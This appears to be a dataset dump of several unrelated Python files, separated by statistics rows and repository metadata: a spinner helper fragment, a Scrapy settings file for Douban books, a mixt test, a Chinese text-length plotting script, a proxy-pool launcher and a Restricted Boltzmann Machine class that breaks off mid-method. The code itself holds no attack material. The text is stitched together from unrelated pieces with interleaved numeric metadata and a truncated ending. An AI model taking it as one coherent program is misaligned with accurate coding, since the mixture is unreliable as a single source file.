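# Illustration (not part of the vendored module): a minimal sketch of driving the
# factory above; nospin=True selects the DummySpinner so no spinner thread is
# started. Assumes the surrounding vistir package is importable.
def _example_spinner():  # hypothetical helper, added for illustration only
    with create_spinner(text="Resolving dependencies...", nospin=True) as sp:
        sp.write("step 1 done")
        sp.ok("OK")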
| 33.120393
| 105
| 0.602819
| 12,530
| 0.929525
| 0
| 0
| 543
| 0.040282
| 0
| 0
| 2,288
| 0.169733
|
a24661a46dbbfae17cce472d5d44c7bd7360c84c
| 621
|
py
|
Python
|
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | 1
|
2021-04-12T13:37:48.000Z
|
2021-04-12T13:37:48.000Z
|
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | null | null | null |
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
BOT_NAME = 'book'
SPIDER_MODULES = ['book.spiders']
NEWSPIDER_MODULE = 'book.spiders'
IMAGES_STORE = '../storage/book/'
COOKIES_ENABLED = True
COOKIE_DEBUG = True
LOG_LEVEL = 'INFO'
# LOG_LEVEL = 'DEBUG'
CONCURRENT_REQUESTS = 100
CONCURRENT_REQUESTS_PER_DOMAIN = 1000
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, \
like Gecko) Chrome/49.0.2623.87 Safari/537.36"
DEFAULT_REQUEST_HEADERS = {
'Referer': 'https://m.douban.com/book/'
}
ITEM_PIPELINES = {
'book.pipelines.CoverPipeline': 0,
'book.pipelines.BookPipeline': 1,
}
| 20.7
| 79
| 0.705314
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 332
| 0.534622
|
a246d1c2c2b92da01d8058201ebb138463ac4efe
| 105
|
py
|
Python
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 27
|
2018-06-04T19:11:42.000Z
|
2022-02-23T22:46:39.000Z
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 7
|
2018-06-09T15:27:51.000Z
|
2021-03-11T20:00:35.000Z
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 3
|
2018-07-29T10:20:02.000Z
|
2021-11-18T19:55:07.000Z
|
# coding: mixt
from mixt import html
def test():
assert str(<Fragment>'''</Fragment>) == """'''"""
| 15
| 53
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.371429
|
a247922adf11769c636098f78e98f1b9b8df3ed1
| 6,325
|
py
|
Python
|
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | 3
|
2021-11-19T07:02:53.000Z
|
2021-12-15T03:15:15.000Z
|
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | null | null | null |
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | null | null | null |
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/27 21:18
# @author : Mo
# @function: statistics
from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files
from text_analysis.conf.path_log import logger
from collections import Counter
from typing import List, Dict
import json
import os
import matplotlib.ticker as ticker
import matplotlib.pyplot as plt
from pylab import mpl
def counter_length_label(path_file, dir_save, show: str="bar"):
"""
    Count text lengths and label frequencies.
    :param path_file: str
    :param dir_save: str
:return:
"""
files = get_all_dirs_files(path_file)
files = [file for file in files if file.endswith(".json")]
tc_data_dev = []
for f in files:
tc_data_dev += txt_read(f)
    # text lengths and label counts
lengths_question = []
label_total = []
for tdd in tc_data_dev:
tdd_json = json.loads(tdd)
question = tdd_json.get("text", "")
label = tdd_json.get("label")
lengths_question.append(len(question))
if type(label) == list:
label_total += label
else:
label_total.append(label)
    # count frequencies
lengths_dict = dict(Counter(lengths_question))
label_dict = dict(Counter(label_total))
    # sort
lengths_dict_sort = sorted(lengths_dict.items(), key=lambda x: x[0], reverse=False)
label_dict_sort = sorted(label_dict.items(), key=lambda x: x[1], reverse=True)
logger.info("length of text is {}".format(lengths_dict_sort))
logger.info("freq of label is {}".format(label_dict_sort))
    # length coverage
lengths_question.sort()
len_ques = len(lengths_question)
len_99 = lengths_question[int(0.99 * len_ques)]
len_98 = lengths_question[int(0.98 * len_ques)]
len_95 = lengths_question[int(0.95 * len_ques)]
len_90 = lengths_question[int(0.90 * len_ques)]
logger.info("99% length of text is {}".format(len_99))
logger.info("98% length of text is {}".format(len_98))
logger.info("95% length of text is {}".format(len_95))
logger.info("90% length of text is {}".format(len_90))
length_dict = {"len_99": len_99,
"len_98": len_98,
"len_95": len_95,
"len_90": len_90
}
    # text length distribution / dict
    save_json(length_dict, os.path.join(dir_save, "length.json"))
    # text length distribution / plot
    draw_picture(lengths_dict_sort, os.path.join(dir_save, "length.png"), show="plot")
    # label frequencies / plot
    draw_picture(label_dict_sort, os.path.join(dir_save, "label.png"), show)
    # length boxplot / plot
draw_box([lengths_question], os.path.join(dir_save, "{}_boxplot.png".format("length")))
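# Note (added for clarity): the coverage values above are plain percentile lookups
# on the sorted lengths. For a hypothetical list of 100 sorted lengths,
# len_95 = lengths_question[int(0.95 * 100)] = lengths_question[95], i.e. roughly
# 95% of the texts are no longer than that value.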
def show_chinese(xs: List, ys: List, file: str=None, show: str="bar"):
"""
    Draw a chart (line, pie or bar) with Chinese-label support.
    :param xs: list
    :param ys: list
    :param file: str
:return: draw picture
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"]
xis = [i for i in range(len(xs))]
if len(ys) >= 32:
plt.xscale('symlog')
plt.yscale('symlog')
plt.subplots_adjust(bottom=0.2)
# plt.figure(dpi=64)
# elif len(ys) >= 128:
# plt.xscale('log')
# plt.yscale('log')
# plt.yticks(xis, ys, size='small', fontsize=13)
if show=="plot": # 绘制折线图
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(64))
# plt.figure(dpi=256)
# from matplotlib.font_manager import FontProperties
# font = FontProperties(fname="C:\Windows\Fonts\simkai.ttf", size=16)
# fontproperites = font
# fontdict={"fontname":"C:\Windows\Fonts\simkai.ttf"}
# plt.xlabel(xs, fontproperites = font)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
        plt.plot(xis, xs, 'o-', label=u"线条") # plot the line
elif show=="pie": # 绘制扇形图
# plt.figure(dpi=256)
plt.xticks(xis, xs, size='small', rotation=64, fontsize=13)
plt.pie(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)
    else: # draw a bar chart
        # create the canvas
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(max(int(len(xs)/16), 128)))
# plt.figure(dpi=128)
# plt.figure(dpi=256)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.bar(xis, xs, 0.8)
# plt.figure(figsize=(min(512, len(xs)), min(256, int(len(xs)/2))), dpi=32)
# plt.figure(dpi=128)
# plt.yticks(xis, ys, size='small', fontsize=13)
# plt.barh(xis, xs, 0.8)
    if file: # save the figure; savefig must be called before plt.show()
        plt.savefig(file)
    else: # no path given, fall back to a default name
plt.savefig("fig.png")
# plt.show()
plt.close()
def draw_picture(xy_list_tuple, path, show: str="bar"):
"""
    Plot and save the text-length / label statistics.
:param xy_list_tuple: List[tuple]
:param path: str
:return:
"""
length_x = []
length_y = []
for k, v in xy_list_tuple:
length_x.append(k)
length_y.append(v)
show_chinese(length_y, length_x, path, show)
def draw_box(boxs: List, file: str=None):
"""
    Box plot via matplotlib boxplot().
:param boxs: list
:param file: str
:return:
"""
    mpl.rcParams["font.sans-serif"] = ["SimHei"] # Chinese font
    plt.figure(figsize=(10, 5)) # set the figure size
    plt.title("boxplot-length", fontsize=20) # title and font size
    # notch: whether to draw a notched box plot; sym: marker style for outliers
    plt.boxplot(boxs, notch=True, sym="*", vert=False, showmeans=True, patch_artist=True)
    # boxprops={'color':'orangered', 'facecolor':'gray'}) # colors
    if file: # save the figure; savefig must be called before plt.show()
        plt.savefig(file)
    else: # no path given, fall back to a default name
        plt.savefig("boxplot.png")
    # plt.show() # show the figure
plt.close()
if __name__ == '__main__':
path_in_dir = "../data/corpus/classify"
path_save_dir = "../data/corpus/classify/分析结果"
if path_save_dir is None:
path_save_dir = os.path.join(os.path.dirname(path_in_dir), "分析结果")
if path_save_dir:
if not os.path.exists(path_save_dir):
os.mkdir(path_save_dir)
counter_length_label(path_in_dir, path_save_dir, show="bar")
# show_x = [i for i in range(32)]
# show_y = [str("你是谁") for i in range(32)]
# show_chinese(show_x, show_y, file="xy1.png")
# show_chinese(show_x, show_y, file="xy2.png", show="pie")
# show_chinese(show_x, show_y, file="xy3.png", show="plot")
| 33.115183
| 105
| 0.61502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,791
| 0.415513
|
a2480500111770e0985c6d623537477de897c591
| 1,689
|
py
|
Python
|
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
#coding:utf-8
"""
@author : linkin
@email : yooleak@outlook.com
@date : 2018-10-04
"""
import logging
from APIserver.apiserver import app
from components.collector import Collector
from components.validator import Validator
from components.detector import Detector
from components.scanner import Scaner
from components.tentacle import Tentacle
from multiprocessing import Pool
from multiprocessing import Manager
from config.config import MODE
from const.settings import RUN_FUNC
logger = logging.getLogger()
class Workstation(object):
"""
    The launch panel for the whole project.
"""
def __init__(self):
self.collector = Collector()
self.validator = Validator()
self.detector = Detector()
self.scanner = Scaner()
self.tentacle = Tentacle()
self.proxyList = Manager().list()
def run_validator(self,proxyList):
self.validator.run(proxyList)
def run_collector(self,proxyList):
self.collector.run(proxyList)
def run_detector(self,*params):
self.detector.run()
def run_scanner(self,*params):
self.scanner.run()
def run_tentacle(self,*params):
self.tentacle.run()
def work(self):
"""
        Project entry point. Runs the components enabled by the MODE setting in
        config, which keeps the components isolated and loosely coupled. The
        asynchronous worker processes need a shared variable, so a
        multiprocessing Manager is used to create the shared list.
"""
pool = Pool(5)
func = []
for i in MODE:
if MODE[i]:
func.append(eval('self.'+RUN_FUNC[i]))
[pool.apply_async(fun,args=(self.proxyList,)) for fun in func]
pool.close()
app.run(host='0.0.0.0',port=2020)
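# Illustration (not part of the original module): a minimal, self-contained sketch
# of the pattern used in work() above -- a Manager-backed list shared between
# asynchronous worker processes. All names here are hypothetical.
def _example_worker(proxy_list):  # must live at module level so it can be pickled
    proxy_list.append('127.0.0.1:8080')
def _example_shared_list():  # hypothetical helper, added for illustration only
    shared = Manager().list()
    pool = Pool(2)
    pool.apply_async(_example_worker, args=(shared,))
    pool.close()
    pool.join()
    return list(shared)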
| 24.838235
| 70
| 0.625222
| 1,244
| 0.680898
| 0
| 0
| 0
| 0
| 0
| 0
| 430
| 0.235359
|
a2482ec97e97d9e65a4d8d49711236d2566859ca
| 30,410
|
py
|
Python
|
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
import abc
import logging
from enum import Enum
from tqdm import tqdm
from ml import np
from ml.functions import sigmoid, dot_batch, bernoulli_from_probas
_log = logging.getLogger("ml")
class UnitType(Enum):
GAUSSIAN = 1
BERNOULLI = 2
class RBMSampler(object):
"""Sampler used in training of RBMs for estimating the gradient.
"""
def __init__(self, args):
super(RBMSampler, self).__init__()
self.args = args
class RBM:
"""
Restricted Boltzmann Machine with either Bernoulli or Gaussian
visible/hidden units.
Attributes
    ----------
num_visible: int
Number of visible units.
num_hidden: int
Number of hidden units.
visible_type: UnitType or str, default='bernoulli'
Type of random variable the visible units are assumed to be.
hidden_type: UnitType or str, default='bernoulli'
Type of random variable the hidden units are assumed to be.
estimate_visible_sigma: bool, default=False
Whether or not to estimate the variance of the visible units.
If :attr:`visible_type` is non-Gaussian, then this has no effect.
estimate_hidden_sigma: bool, default=False
Whether or not to estimate the variance of the hidden units.
If :attr:`hidden_type` is non-Gaussian, then this has no effect.
sampler_method: str, default='cd'
Specifies the method used in the sampling process when approximating
the gradient.
Available methods are:
- Contrastive Divergence (CD)
- Persistent Contrastive Divergence (PCD)
- Parallel Tempering (PT)
See :func:`RBM.grad` for more information about the
effects of the different available methods.
variables: list[array-like]
Holds the learnable parameters of the machine. This is used by
:func:`RBM.step` to deduce what parameters to update.
See Also
--------
:func:`RBM.grad` for more information about samplers.
"""
def __init__(self, num_visible, num_hidden,
visible_type='bernoulli', hidden_type='bernoulli',
estimate_visible_sigma=False, estimate_hidden_sigma=False,
sampler_method='cd'):
super(RBM, self).__init__()
self._warned_acceptance = 0
self.num_visible = num_visible
self.num_hidden = num_hidden
if sampler_method.lower() not in {'cd', 'pcd', 'pt'}:
raise ValueError(f"{sampler_method} is not supported")
self.sampler_method = sampler_method.lower()
# used by `PCD` sampler
self._prev = None
if isinstance(visible_type, str):
self.visible_type = getattr(UnitType, visible_type.upper())
else:
self.visible_type = visible_type
if isinstance(hidden_type, str):
self.hidden_type = getattr(UnitType, hidden_type.upper())
else:
self.hidden_type = hidden_type
self.estimate_visible_sigma = estimate_visible_sigma
self.estimate_hidden_sigma = estimate_hidden_sigma
self.v_bias, self.h_bias, self.v_sigma, self.h_sigma, self.W = self.initialize(
num_visible,
num_hidden
)
self._variables = [self.v_bias, self.h_bias, self.W]
if self.estimate_visible_sigma:
self._variables.append(self.v_sigma)
if self.estimate_hidden_sigma:
self._variables.append(self.h_sigma)
@property
def variables(self):
return self._variables
@staticmethod
def initialize(num_visible, num_hidden):
# biases for visible and hidden, respectively
v_bias = np.zeros(num_visible)
h_bias = np.zeros(num_hidden)
# weight matrix
W = np.random.normal(0.0, 0.01, (num_visible, num_hidden))
# variances
v_sigma = np.ones(num_visible)
h_sigma = np.ones(num_hidden)
return v_bias, h_bias, v_sigma, h_sigma, W
def energy(self, v, h):
if self.visible_type == UnitType.BERNOULLI:
visible = np.matmul(v, self.v_bias)
elif self.visible_type == UnitType.GAUSSIAN:
visible = ((v - self.v_bias) ** 2) / (self.v_sigma ** 2
+ np.finfo(np.float32).eps)
visible = 0.5 * np.sum(visible, axis=1)
# term only dependent on hidden
if self.hidden_type == UnitType.BERNOULLI:
hidden = np.matmul(h, self.h_bias)
elif self.hidden_type == UnitType.GAUSSIAN:
hidden = ((h - self.h_bias) ** 2) / (self.h_sigma ** 2
+ np.finfo(np.float32).eps)
hidden = 0.5 * np.sum(hidden, axis=1)
# "covariance" term
# v^T W = sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = np.matmul(v, self.W)
# v^T W h = sum_{\mu} h_{\mu} sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = dot_batch(h, covariance)
return - (visible + hidden + covariance)
def mean_visible(self, h, beta=1.0):
r"""
Computes :math:`\mathbb{E}[\mathbf{v} \mid \mathbf{h}]`.
It can be shown that this expectation equals: [1]_
- Bernoulli:
.. math::
:nowrap:
\begin{equation}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] =
p \big( V_{i} = 1 \mid \mathbf{h} \big) = \text{sigmoid}
\Bigg( \beta \bigg( b_{i} + \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}} \bigg) \Bigg)
\end{equation}
- Gaussian:
.. math::
:nowrap:
\begin{equation*}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] = b_i + \sigma_i \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}}
\end{equation*}
where :math:`\sigma_{\mu} = 1` if :math:`H_\mu` is a Bernoulli random variable.
Notes
-----
Observe that the expectation when using Gaussian units is
independent of :math:`\beta`. To see the effect :math:`\beta` has
on the Gaussian case, see :func:`RBM.proba_visible`.
References
----------
.. [1] Fjelde, T. E., Restricted Boltzmann Machines, , (), (2018).
"""
mean = self.v_bias + (self.v_sigma *
np.matmul(h / self.h_sigma, self.W.T))
if self.visible_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.visible_type == UnitType.GAUSSIAN:
return mean
def mean_hidden(self, v, beta=1.0):
"Computes conditional expectation E[h | v]."
mean = self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)
if self.hidden_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.hidden_type == UnitType.GAUSSIAN:
return mean
def sample_visible(self, h, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
v = bernoulli_from_probas(mean)
elif self.visible_type == UnitType.GAUSSIAN:
v = np.random.normal(loc=mean,
scale=self.v_sigma ** 2 / beta,
size=mean.shape)
else:
raise ValueError(f"unknown type {self.visible_type}")
return v
def sample_hidden(self, v, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
        if self.hidden_type == UnitType.BERNOULLI:
            # E[h | v] = p(h | v) for Bernoulli
            h = bernoulli_from_probas(mean)
        elif self.hidden_type == UnitType.GAUSSIAN:
            h = np.random.normal(loc=mean,
                                 scale=(self.h_sigma ** 2 / beta),
                                 size=(mean.shape))
        else:
            raise ValueError(f"unknown type {self.hidden_type}")
return h
def proba_visible(self, h, v=None, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
p = mean
elif self.visible_type == UnitType.GAUSSIAN:
            z = np.clip((v - mean) ** 2 / (2.0 * self.v_sigma ** 2),
                        -30.0, 30.0)
            z *= beta
            # Gaussian density; note the negative exponent
            p = (np.exp(-z) / (np.sqrt(2 * np.pi) * self.v_sigma
                               + np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.visible_type}")
return p
def sample(self, v, beta=1.0):
return self.sample_visible(self.sample_hidden(v, beta=beta), beta=beta)
def proba_hidden(self, v, h=None, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
if self.hidden_type == UnitType.BERNOULLI:
            # E[h | v] = p(h | v) for Bernoulli
p = mean
elif self.hidden_type == UnitType.GAUSSIAN:
            z = np.clip((h - mean) ** 2 / (2.0 * self.h_sigma ** 2),
                        -30.0, 30.0)
            z *= beta
            # Gaussian density; note the negative exponent
            p = (np.exp(-z) / (np.sqrt(2 * np.pi) * self.h_sigma
                               + np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.hidden_type}")
return p
def free_energy(self, v, beta=1.0, raw=False):
if self.hidden_type == UnitType.BERNOULLI:
hidden = self.h_bias + np.matmul((v / self.v_sigma), self.W)
hidden *= beta
hidden = - np.sum(np.log(1.0 + np.exp(np.clip(hidden, -30, 30))),
axis=1)
elif self.hidden_type == UnitType.GAUSSIAN:
# TODO: Implement
# Have the formulas, but gotta make sure yo!
hidden = np.sum(
1 / (2 * self.h_sigma) * (
self.h_bias ** 2
- (self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)) ** 2
),
axis=1
)
hidden -= 0.5 * self.num_hidden * np.log(2 * np.pi) + np.sum(np.log(self.h_sigma))
# raise NotImplementedError()
if self.visible_type == UnitType.BERNOULLI:
visible = - np.matmul(v, self.v_bias)
visible *= beta
elif self.visible_type == UnitType.GAUSSIAN:
visible = 0.5 * np.sum(
((v - self.v_bias) ** 2)
/ (self.v_sigma ** 2 / beta + np.finfo(np.float32).eps),
axis=1
)
else:
raise ValueError(f"unknown type {self.visible_type}")
# sum across batch to obtain log of joint-likelihood
if raw:
return hidden + visible
else:
return np.mean(hidden + visible)
def contrastive_divergence(self, v_0,
k=1,
h_0=None,
burnin=-1,
beta=1.0):
"""Contrastive Divergence.
Parameters
----------
v_0: array-like
Visible state to initialize the chain from.
k: int
Number of steps to use in CD-k.
        h_0: array-like, optional
            Hidden states to initialize the chain.
            If not specified, they are sampled conditioned on the visible states.
Returns
-------
h_0, h, v_0, v: arrays
``h_0`` and ``v_0`` are the initial states for the hidden and
visible units, respectively.
``h`` and ``v`` are the final states for the hidden and
visible units, respectively.
"""
if h_0 is None:
h_0 = self.sample_hidden(v_0, beta=beta)
v = v_0
h = h_0
for t in range(k):
v = self.sample_visible(h, beta=beta)
h = self.sample_hidden(v, beta=beta)
return v_0, h_0, v, h
def reset_sampler(self):
if self.sampler_method == 'pcd':
self._prev = None
def _init_parallel_tempering(self, v, betas=None, num_temps=10, **kwargs):
# 1. Initialize list of samples
if betas is None:
n = num_temps
else:
n = len(betas)
return np.tile(v, (n, 1, 1))
def parallel_tempering(self, vs, hs=None,
k=1,
betas=None,
max_temp=100, num_temps=10,
include_negative_shift=False):
# TODO: Performing sampling in parallel, rather than using a loop
# 1. Allow `self.contrastive_divergence` to take on arrays of betas
# 2. Stack betas and initial samples
# 3. Perform sampling
# 4. Unstack
batch_size = vs[0].shape[0]
# 1. Initialize list of samples
if betas is None:
betas = np.linspace(1, max_temp, num_temps) ** (-1)
R = len(betas)
res = []
if include_negative_shift:
neg_res = []
# 2. Perform gibbs sampling for tempered distributions
for r in range(R):
v = vs[r]
if hs is not None:
h = hs[r]
else:
h = None
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
k=k,
beta=betas[r],
h_0=h
)
res.append((v_k, h_k))
if include_negative_shift:
neg_res.append((v_0, h_0))
# 3. Simulated Annealing to perform swaps ("exchange particles")
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*res[r]) - self.energy(*res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = res[r][0] * acc_mask + res[r - 1][0] * rej_mask
h = res[r][1] * acc_mask + res[r - 1][1] * rej_mask
res[r - 1] = v, h
# TODO: this is useless, right? We're not ever using `res[r]` again
# in this iteration
v = res[r - 1][0] * acc_mask + res[r][0] * rej_mask
h = res[r - 1][1] * acc_mask + res[r][1] * rej_mask
res[r] = v, h
# warn user if very small/large number of samples rejected/accepted
# but don't if the `batch_size` is super small..
if r == 1 and batch_size > 2 and self._warned_acceptance < 10:
num_acc = acc_mask[acc_mask].shape[0]
if num_acc >= 0.9 * batch_size:
_log.warn(f"Large portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
elif num_acc <= 0.1 * batch_size:
_log.warn(f"Small portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
# possibly perform same for the negative shift
if include_negative_shift:
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*neg_res[r]) - self.energy(*neg_res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = neg_res[r][0] * acc_mask + neg_res[r - 1][0] * rej_mask
h = neg_res[r][1] * acc_mask + neg_res[r - 1][1] * rej_mask
neg_res[r - 1] = v, h
v = neg_res[r - 1][0] * acc_mask + neg_res[r][0] * rej_mask
h = neg_res[r - 1][1] * acc_mask + neg_res[r][1] * rej_mask
neg_res[r] = v, h
res_v = [r[0] for r in res]
res_h = [r[1] for r in res]
# return final state
if include_negative_shift:
neg_res_v = [r[0] for r in neg_res]
neg_res_h = [r[1] for r in neg_res]
return neg_res_v, neg_res_h, res_v, res_h
else:
return res_v, res_h
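    # Worked example of the swap rule above (illustrative): for adjacent
    # inverse temperatures betas[r] = 0.5, betas[r - 1] = 1.0 and energies
    # E_r = -10, E_{r-1} = -12, the acceptance ratio is
    # exp((0.5 - 1.0) * (-10 - (-12))) = exp(-1) ~= 0.368, and a swap is kept
    # whenever the uniform draw u falls below it.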
def _update(self, grad, lr=0.1):
# in case using `cupy`, can't use `np.shape`
# to obtain "shape" of single element; this is a fix
lr = np.asarray(lr)
gamma = lr
for i in range(len(self.variables)):
if lr.shape:
gamma = lr[i]
self.variables[i] -= gamma * grad[i]
def _apply_weight_decay(self, lmbda=0.01):
for i in range(len(self.variables)):
# default is gradient DEscent, so weight-decay also switches signs
self.variables[i] += lmbda * self.variables[i]
def step(self, v, k=1, lr=0.1, lmbda=0.0, **sampler_kwargs):
"Performs a single gradient DEscent step on the batch `v`."
# compute gradient for each observed visible configuration
grad = self.grad(v, k=k, **sampler_kwargs)
# update parameters
self._update(grad, lr=lr)
# possibly apply weight-decay
if lmbda > 0.0:
self._apply_weight_decay(lmbda=lmbda)
def reconstruct(self, v, num_samples=100):
samples = self.sample_visible(self.sample_hidden(v))
for _ in range(num_samples - 1):
samples += self.sample_visible(self.sample_hidden(v))
probs = samples / num_samples
return probs
def grad(self, v, burnin=-1, persist=False, **sampler_kwargs):
if self.sampler_method.lower() == 'cd':
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
**sampler_kwargs
)
elif self.sampler_method.lower() == 'pcd':
# Persistent Contrastive Divergence
if self._prev is not None:
v_0, h_0 = self._prev
else:
# ``burnin`` specified, we perform this to initialize the chain
if burnin > 0:
_log.info(f"Performing burnin of {burnin} steps to initialize PCD")
_, _, h_0, v_0 = self.contrastive_divergence(v, k=burnin, **sampler_kwargs)
else:
h_0 = self.sample_hidden(v, **sampler_kwargs)
v_0 = v
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
h_0=h_0,
**sampler_kwargs
)
# persist
self._prev = (v_k, h_k)
elif self.sampler_method.lower() == 'pt':
h_0 = None
if self._prev is not None:
v_0, h_0 = self._prev
else:
_log.info("Initializing PT chain...")
v_0 = self._init_parallel_tempering(v, **sampler_kwargs)
# FIXME: make compatible with `parallel_tempering` returning
# all the states
if h_0 is None:
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
include_negative_shift=True,
**sampler_kwargs
)
elif sampler_kwargs.get("include_negative_shift", False):
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
else:
# FIXME: make compatible with `parallel_tempering` returning
# all the states
v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
if persist:
self._prev = (v_k, h_k)
# take the first tempered distribution, i.e. the one corresponding
# the target distribution
v_0 = v_0[0]
h_0 = h_0[0]
v_k = v_k[0]
            h_k = h_k[0]
else:
raise ValueError(f"{self.sampler_method} is not supported")
# all expressions below using `v` or `mean_h` will contain
# AT LEAST one factor of `1 / v_sigma` and `1 / h_sigma`, respectively
# so we include those right away
v_0 = v_0 / self.v_sigma
v_k = v_k / self.v_sigma
mean_h_0 = self.mean_hidden(v_0) / self.h_sigma
mean_h_k = self.mean_hidden(v_k) / self.h_sigma
        # Recall: `v_sigma` and `h_sigma` have no effect if they are set to 1
# v_0 / (v_sigma^2) - v_k / (v_sigma^2)
delta_v_bias = (v_0 - v_k) / self.v_sigma
# E[h_0 | v_0] / (h_sigma^2) - E[h_k | v_k] / (h_sigma^2)
delta_h_bias = (mean_h_0 - mean_h_k) / self.h_sigma
# Gradient wrt. W
# (v_0 / v_sigma) (1 / h_sigma) E[h_0 | v_0] - (v_k / v_sigma) (1 / h_sigma) E[h_k | v_k]
x = mean_h_0.reshape(mean_h_0.shape[0], 1, mean_h_0.shape[1])
y = v_0.reshape(v_0.shape[0], v_0.shape[1], 1)
z_0 = np.matmul(y, x)
x = mean_h_k.reshape(mean_h_k.shape[0], 1, mean_h_k.shape[1])
y = v_k.reshape(v_k.shape[0], v_k.shape[1], 1)
z_k = np.matmul(y, x)
delta_W = z_0 - z_k
# average over batch take the negative
delta_v_bias = - np.mean(delta_v_bias, axis=0)
delta_h_bias = - np.mean(delta_h_bias, axis=0)
delta_W = - np.mean(delta_W, axis=0)
grads = [delta_v_bias, delta_h_bias, delta_W]
# variances
if self.visible_type == UnitType.GAUSSIAN \
and self.estimate_visible_sigma:
# in `GaussianRBM`, where only VISIBLE units Gaussian,
# we only compute `v_sigma`
# (((v_0 - b)^2 / (v_sigma^2)) - (v / (v_sigma)) \sum_{\mu} E[h_{\mu} | v] / sigma_{\mu}) / v_sigma
delta_v_sigma_data = (((v_0 - (self.v_bias / self.v_sigma)) ** 2)
- v_0 * (np.matmul(mean_h_0, self.W.T)))
delta_v_sigma_model = (((v_k - (self.v_bias / self.v_sigma)) ** 2)
- v_k * (np.matmul(mean_h_k, self.W.T)))
delta_v_sigma = (delta_v_sigma_data - delta_v_sigma_model) / self.v_sigma
# average over batch take the negative
delta_v_sigma = - np.mean(delta_v_sigma, axis=0)
grads.append(delta_v_sigma)
